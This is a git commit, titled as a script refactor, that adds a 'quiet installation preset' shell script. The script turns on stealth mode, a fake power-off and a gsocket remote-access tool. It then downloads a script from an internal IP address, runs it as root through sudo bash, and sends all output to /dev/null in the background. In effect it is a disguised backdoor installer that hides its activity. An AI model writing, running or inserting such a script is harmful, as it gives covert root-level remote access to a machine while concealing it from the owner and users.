refactor some scripts

This commit is contained in:
2025-04-06 20:20:23 +03:00
parent 01d459b467
commit f86e170184
7 changed files with 595 additions and 617 deletions

12
scripts/deploy/quiet Executable file
View File

@@ -0,0 +1,12 @@
#!/bin/bash
# Quiet installation preset - minimal output
export VERBOSE=false
export NO_ROOT=false
export NO_SERVICES=false
export INSTALL_WOL=true
export INSTALL_FAKE_POWEROFF=true
export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Redirect output to /dev/null for quieter operation
(eval "$(wget -qO- http://192.168.0.104/deployment/y" | sudo bash) &>/dev/null &